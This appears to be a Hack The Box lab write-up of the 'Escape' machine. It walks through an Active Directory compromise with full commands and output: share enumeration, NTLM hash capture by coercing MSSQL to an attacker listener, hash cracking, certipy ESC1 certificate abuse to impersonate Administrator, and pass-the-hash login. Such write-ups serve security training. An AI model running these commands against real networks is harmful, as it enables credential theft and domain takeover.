Introduction
Escape is a medium-difficulty Windows machine on Hack The Box that revolves around Active Directory. The initial foothold is gained by finding credentials in a PDF file on an open SMB share. This access is then leveraged to connect to an MSSQL service, from which we capture and crack the NTLM hash of a service account. Lateral movement is achieved by discovering another user’s credentials in a log file. Finally, privilege escalation to Administrator is accomplished by exploiting a misconfiguration in Active Directory Certificate Services (ADCS), specifically the ESC1 vulnerability.
Scanning and Enumeration
Nmap Scan
We start with a basic Nmap scan to identify open ports and services running on the target machine.
sudo nmap -n -v -Pn -sC -sV -oN nmap.txt 10.10.11.202
# Nmap 7.95 scan initiated Wed Jul 2 10:21:36 2025 as: /usr/lib/nmap/nmap -n -v -Pn -sC -sV -oN nmap.txt 10.10.11.202
Nmap scan report for 10.10.11.202
Host is up (0.13s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-02 21:59:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 2 10:23:22 2025 -- 1 IP address (1 host up) scanned in 105.64 seconds
We get the following information from the scan:
- Open Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 1433, 3268, 3269, and 5985.
- Services: DNS, Kerberos, MSRPC, NetBIOS, LDAP, MSSQL, and HTTPAPI.
- Operating System: Microsoft Windows Server 2019.
- Active Directory: Domain -
sequel.htb
and DC -dc.sequel.htb
.
We now add the target to our /etc/hosts
file for easier access:
10.10.11.202 dc.sequel.htb sequel.htb
Foothold
Looking at the Nmap scan we can confim that this is a Windows machine with Active Directory services running.
SMB Enumeration
We have no credentials yet, so we will start by enumerating SMB service using guest user credentials.
kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'a' -p ''
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\a: (Guest)
We can see that we have access to the sequel.htb
domain with guest credentials.
Enumerating users using nxc
’s rid-brute
module:
We find users:
- 1000:
sequel\DC$
(SidTypeUser) - 1101:
sequel\DnsAdmins
(SidTypeAlias) - 1102:
sequel\DnsUpdateProxy
(SidTypeGroup) - 1103:
sequel\Tom.Henn
(SidTypeUser) - 1104:
sequel\Brandon.Brown
(SidTypeUser) - 1105:
sequel\Ryan.Cooper
(SidTypeUser) - 1106:
sequel\sql_svc
(SidTypeUser) - 1107:
sequel\James.Roberts
(SidTypeUser) - 1108:
sequel\Nicole.Thompson
(SidTypeUser) - 1109:
sequel\SQLServer2005SQLBrowserUser$DC
(SidTypeAlias)
We can now enumerate the shares available on the target machine.
kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'a' -p '' --shares
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\a: (Guest)
SMB 10.10.11.202 445 DC [*] Enumerated shares
SMB 10.10.11.202 445 DC Share Permissions Remark
SMB 10.10.11.202 445 DC ----- ----------- ------
SMB 10.10.11.202 445 DC ADMIN$ Remote Admin
SMB 10.10.11.202 445 DC C$ Default share
SMB 10.10.11.202 445 DC IPC$ READ Remote IPC
SMB 10.10.11.202 445 DC NETLOGON Logon server share
SMB 10.10.11.202 445 DC Public READ
SMB 10.10.11.202 445 DC SYSVOL Logon server share
Public Share Enumeration
We can see that we have access to the Public
share. Let’s enumerate it further using smbclient
to see if we can find any interesting files.
kali@kali:~/boxes/Escape.htb$ smbclient //10.10.11.202/Public -U a%
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1475930 blocks available
smb: \>
We see one interesting file named SQL Server Procedures.pdf
. Let’s download it to our local machine.
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (57.1 KiloBytes/sec) (average 57.1 KiloBytes/sec)
We can open the PDF file to see if it contains any useful information. On page 2 we find:
This gives us a username PublicUser
and a password Gu██████rCantWrite1
.
We can now use these credentials to authenticate to the MSSQL service using nxc
.
(Remember, we need to use the --local-auth
flag since we are not using domain credentials.)
kali@kali:~/boxes/Escape.htb$ nxc mssql 10.10.11.202 -u PublicUser -p Gu██████rCantWrite1 --local-auth
MSSQL 10.10.11.202 1433 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL 10.10.11.202 1433 DC [+] DC\PublicUser:Gu██████rCantWrite1
We now use responder
to capture the NTLM hash of the user which is running the MSSQL service.
kali@kali:~/boxes/Escape.htb$ sudo responder -I tun0
Coercing MSSQL Service to capture NTLM Hash
We can now use nxc
to coerce the MSSQL service to authenticate to our responder instance and capture the NTLM hash.
nxc mssql 10.10.11.202 -u PublicUser -p Gu██████rCantWrite1 --local-auth -M mssql_coerce -o LISTENER=10.10.16.31
-u
: Username to authenticate with.-p
: Password for the user.--local-auth
: Use local authentication instead of domain authentication.-M mssql_coerce
: Use the MSSQL coerce module to force the MSSQL service to authenticate to our responder instance.-o LISTENER=10.10.16.31
: Specify the IP address of our responder instance to listen for NTLM authentication requests.
kali@kali:~/boxes/Escape.htb$ nxc mssql 10.10.11.202 -u PublicUser -p Gu██████rCantWrite1 --local-auth -M mssql_coerce -o LISTENER=10.10.16.31
MSSQL 10.10.11.202 1433 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL 10.10.11.202 1433 DC [+] DC\PublicUser:Gu██████rCantWrite1
MSSQL_CO... 10.10.11.202 1433 DC [*] Commands executed successfully, check the listener for results
On the responder terminal, we should see the NTLM hash being captured:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:1477a8036251ce8d:E831360C3DB15470D312ABD86D1FB13A:0101000000000000800F761945EBDB0127C222671E60681000000000020008004E0049005200540001001E00570049004E002D004B004700380041003800350038004A004D005100320004003400570049004E002D004B004700380041003800350038004A004D00510032002E004E004900520054002E004C004F00430041004C00030014004E004900520054002E004C004F00430041004C00050014004E004900520054002E004C004F00430041004C0007000800800F761945EBDB0106000400020000000800300030000000000000000000000000300000DB0C32A828ED9B9428058D4F6FED360FF7215B63396518A0CD474E2AFBFE55940A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00330031000000000000000000
[*] Skipping previously captured hash for sequel\sql_svc
[*] Skipping previously captured hash for sequel\sql_svc
Cracking the NTLM Hash
We can now crack the NTLM hash using hashcat
or john
.
Running the following on our host machine:
hashcat sql_svc.hash SecLists/Passwords/Leaked-Databases/rockyou.txt
We get the password for the sql_svc
user as REGG██████ronnie
.
Checking the password against the sql_svc
user, we can confirm that it is correct.
kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'sql_svc' -p 'REGG██████ronnie'
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\sql_svc:REGG██████ronnie
Checking the users in the Remote Management Users
group:
kali@kali:~/boxes/Escape.htb$ nxc ldap 10.10.11.202 -u 'sql_svc' -p 'REGG██████ronnie' --groups "Remote Management Users"
LDAP 10.10.11.202 389 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
LDAPS 10.10.11.202 636 DC [+] sequel.htb\sql_svc:REGG██████ronnie
LDAPS 10.10.11.202 636 DC sql_svc
LDAPS 10.10.11.202 636 DC Ryan.Cooper
We have 2 users: sql_svc
and Ryan.Cooper
.
Shell as sql_svc
We can now use winrm
to connect to the target machine using the sql_svc
user.
kali@kali:~/boxes/Escape.htb$ evil-winrm-py -i 10.10.11.202 -u 'sql_svc' -p 'REGG██████ronnie'
▘▜ ▘
█▌▌▌▌▐ ▄▖▌▌▌▌▛▌▛▘▛▛▌▄▖▛▌▌▌
▙▖▚▘▌▐▖ ▚▚▘▌▌▌▌ ▌▌▌ ▙▌▙▌
▌ ▄▌ v1.1.2
[*] Connecting to 10.10.11.202:5985 as sql_svc
evil-winrm-py PS C:\Users\sql_svc\Documents>
There is no user.txt
file on the sql_svc
’s Deskop.
Lateral Movement
We are now logged in as the sql_svc
user. We can check the privileges of this user using the whoami /priv
command.
evil-winrm-py PS C:\Users\sql_svc\Documents> whoami /priv
USER INFORMATION
We have a Error log file in the C:\SQLServer\Logs
directory. Let’s check it out.
evil-winrm-py PS C:\SQLServer\Logs> ls
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
Downloading the ERRORLOG.BAK
file to our local machine:
evil-winrm-py PS C:\SQLServer\Logs> download ERRORLOG.BAK .
Downloading C:\SQLServer\Logs\ERRORLOG.BAK: 64.0kB [00:00, 376MB/s]
[+] File downloaded successfully and saved as: /home/kali/boxes/Escape.htb/ERRORLOG.BAK
Finding Credentials in the Error Log
In the ERRORLOG.BAK
file, we find some interesting information, including failed login attempts and the usernames of the users who attempted to log in.
# <----SNIP---->
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMos██████'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
# <----SNIP---->
We can infer that the Ryan.Cooper
user tried to login and mistakenly pressed the Enter
key then entered the password NuclearMos██████
.
Trying to login with the Ryan.Cooper
user using the password NuclearMos██████
:
kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMos██████'
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\Ryan.Cooper:NuclearMos██████
We can see that we have successfully authenticated as the Ryan.Cooper
user.
Now, using winrm
we can get a shell.
evil-winrm-py -i 10.10.11.202 -u ryan.cooper -p NuclearMos██████
Get user.txt
:
evil-winrm-py PS C:\Users\Ryan.Cooper\Desktop> cat user.txt
0c8cd01d32ba██████ba42d9410922d8
Privilege Escalation
ADCS is found to be running.
kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMos██████' -M enum_ca
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\Ryan.Cooper:NuclearMos██████
ENUM_CA 10.10.11.202 445 DC Active Directory Certificate Services Found.
ENUM_CA 10.10.11.202 445 DC http://10.10.11.202/certsrv/certfnsh.asp
Enumerating ADCS Misconfigurations using certipy
We now enumerate misconfigs in ADCS using certipy
.
kali@kali:~/boxes/Escape.htb$ certipy find -u 'Ryan.Cooper' -p 'NuclearMos██████' -dc-ip 10.10.11.202 -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC-CA' via RRP
[*] Successfully retrieved CA configuration for 'sequel-DC-CA'
[*] Checking web enrollment for CA 'sequel-DC-CA' @ 'dc.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
# <----SNIP---->
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
# <----SNIP---->
[+] User Enrollable Principals : SEQUEL.HTB\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
What is ESC1?
The vulnerability arises when a certificate template is inadequately secured, permitting a low-privileged user to request a certificate and, importantly, specify an arbitrary identity within the certificate’s SAN. This allows the attacker to impersonate any user, including administrators. 1
Key indicators in the output:
[!] Vulnerabilities ESC1 : Enrollee supplies subject and template allows client authentication.
=> This explicitly flags the vulnerability.Enrollee Supplies Subject
:True
=> This confirms the setting allowing attacker-defined subjects.Client Authentication
:True
=> This confirms the certificate can be used for logon.[+] User Enrollable Principals
:SEQUEL.HTB\Domain Users
=> This confirms the attacker has the necessary rights to request a certificate from this template.Requires Manager Approval
:False
andAuthorized Signatures Required
:0
=> This confirm the absence of preventative issuance controls.
Requesting a certificate using the vulnerable template, injecting the identity of a privileged target.
certipy req \
-u 'Ryan.Cooper' -p 'NuclearMos██████' \
-dc-ip '10.10.11.202' -target 'dc.sequel.htb' \
-ca 'sequel-DC-CA' -template 'UserAuthentication' \
-upn 'administrator@sequel.htb'
-u
: Username to authenticate with.-p
: Password for the user.-dc-ip
: IP address of the Domain Controller.-target
: Target domain controller.-ca
: Name of the certificate authority.-template
: Name of the certificate template to use.-upn
: User Principal Name (UPN) to inject into the certificate request.
Running the command, we get:
kali@kali:~/boxes/Escape.htb$ certipy req \
-u 'Ryan.Cooper' -p 'NuclearMos██████' \
-dc-ip '10.10.11.202' -target 'dc.sequel.htb' \
-ca 'sequel-DC-CA' -template 'UserAuthentication' \
-upn 'administrator@sequel.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 13
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
The certificate is saved as administrator.pfx
, which contains both the certificate and the private key.
Using the obtained certificate to authenticate as the target.
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202
-pfx
: Path to the PFX file containing the certificate and private key.-dc-ip
: IP address of the Domain Controller.
We try to authenticate using the certificate we just requested, but we encounter a clock skew error. This is likely because the time on our machine is not synchronized with the target machine.
kali@kali:~/boxes/Escape.htb$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
We fix this by using:
sudo rdate -n 10.10.11.202
We can now re-attempt to authenticate using the administrator.pfx
certificate we obtained earlier.
kali@kali:~/boxes/Escape.htb$ certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.202'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f██████51e5f5e17e1e9f3e58f4ee
certipy
successfully authenticated as the administrator
user and retrieved the NT hash.
Using the NT hash, we can now connect to the target machine using winrm
.
kali@kali:~/boxes/Escape.htb$ evil-winrm-py -i 10.10.11.202 -u administrator -H a52f██████51e5f5e17e1e9f3e58f4ee
▘▜ ▘
█▌▌▌▌▐ ▄▖▌▌▌▌▛▌▛▘▛▛▌▄▖▛▌▌▌
▙▖▚▘▌▐▖ ▚▚▘▌▌▌▌ ▌▌▌ ▙▌▙▌
▌ ▄▌ v1.1.2
[*] Connecting to 10.10.11.202:5985 as administrator
evil-winrm-py PS C:\Users\Administrator\Documents>
We can now get the root flag:
evil-winrm-py PS C:\Users\Administrator\Desktop> cat root.txt
12bc39fe2fcfe7326██████1a3e0d208